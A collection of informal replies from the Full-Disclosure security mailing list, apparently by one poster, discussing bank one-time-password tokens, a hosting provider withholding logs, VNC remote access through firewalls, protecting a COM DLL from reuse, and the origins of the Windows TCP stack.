http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
RE: [Full-disclosure] Defeating Citi-Bank Virtual Keyboard Protection
The only most secure protection is a one time password with a challenge / response scheme. Most of the banks in europe already do this. They give out a calculator like device to the customers and when u want to login you are presented with a challenge that you punch into you device which spits a response that you enter that into the form Costly for the bank but very effective security for the customer and bank in terms of gain in security and decrease in losses due to fraud - Aditya Delivered using the Free Personal Edition of Mailtraq (www.mailtraq.com) ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
RE: [Full-disclosure] Cisco CCO hacked
i am sure cisco would love to sue someone over this. Or maybe just maybe someone would want to do that to cisco ! Delivered using the Free Personal Edition of Mailtraq (www.mailtraq.com) ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
RE: [Full-disclosure] Hosting Provider Refuses to Share Server Logs -How to Proceed?
-Original Message- From: [EMAIL PROTECTED] [mailto:[EMAIL PROTECTED] On Behalf Of GeeEm Sent: Tuesday, August 02, 2005 5:53 PM To: full-disclosure@lists.grok.org.uk Subject: [Full-disclosure] Hosting Provider Refuses to Share Server Logs -How to Proceed? This is certainly a sticky situation, if this turn of events were not covered in AUP then simply take your website hosting business to someone else and in the meanwhile ask a lawyer to take a look into this matter if they continue to stone wall you for the logs and other information. After all you should have access to information on the basis of which you were presumed guilty. At a minimum you should demand refund of all your web hosting fees if it worth it. But if it is not worth it simply move your business somewhere else. But first do a google search on your website to make sure that you are not listed in any of the globla blacklists of any phishing sites - if you are then get in contact with the listing site owners and explain the sitation in detail to them. Just make sure that the next hoster has everthing spelled out in the AUP and make sure that you have access to the log files whatever the case spelled out clearly in AUP. Also spell out everthing clearly about security - Aditya Deshmukh, Chief Security Officer , Enterprise Security Solutions. Delivered using the Free Personal Edition of Mailtraq (www.mailtraq.com) ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
RE: [Full-disclosure] Some VNC doubts : access server behind TCP/IPproxy or gateways
VNC does support 'reverse shells'. Look in the manual for your particular version. Yes I am looking and testing this out You would need to open one or more ports on your company's firewall, but that isn't too big a problem, is it? Just tunnel it over something reasonably safe, and tell the helpdesk not to use 'priviliged' machines for incoming calls... The holes are not in the company's firewalls but in the firewalls of the Road warriors' computers mainly winxp sp2, firewall enabled so that nothing Outside can connect to that machine and I would rather keep it that way! Delivered using the Free Personal Edition of Mailtraq (www.mailtraq.com) ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
RE: [Full-disclosure] plz suggest security for DLL functions
friends, We are developing a software that makes use of a COM DLL. The whole logic lies in the dll. The User Interface is in VC++. DLL exposes functions, application calls it and displays result. Now, we found that anybody can copy the DLL, register it and make use of those functions. This is a classic problem that plagues most of the software. They make good libs but don't want others to use them. Have u looked into encrypting the file itself and decrypting the required portion in the memory itself? This way nothing uncrypted in ever on the disk. So no one can actually do anything with a copied file. There are more approaches like anti debugging code like putting some your code in int 1 and int 3 so that debuggers cannot touch your code Or deliberately misaligning memory while some part of the dll so that any calling program that uses the dll has to so work around this bug there are quite other also like changing the PE section and so on Please guide us in making those functions secret or encrypted so that others cannt use our functions. But keep this in mind almost all what you do to protect your dll can be undone with enough time and resources. And someone just might! So if your DLL is heavily encrypted somewhere it would have to be decrypted and if *that* code can be debugged all the battle is lost, and believe me someone may just find a way to do that... Delivered using the Free Personal Edition of Mailtraq (www.mailtraq.com) ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
RE: [Full-disclosure] plz suggest security for DLL functions
About the best you could do to hide the super secret sauce (lol .. Vladis) is put it on a secure token (eg: SmartCard) and call it from there. While not foolproof, hardware is [generally] more difficult to hack. Not for someone who has more knowledge than time and above all more ego than knowledge Delivered using the Free Personal Edition of Mailtraq (www.mailtraq.com) ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
RE: [Full-disclosure] Reverse engineering the Windows TCP stack
AD The win32 tcp stack was stolen from bsd ^^ Get your facts right. Yes bsd lic was used so they dint actually steal it - but as it was 12 am when I send the mail so please excuse me for the mistake.. :) But I say in the lower lines in my that it was not copied properly. Now I will crawl back into my hole Delivered using the Free Personal Edition of Mailtraq (www.mailtraq.com) ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
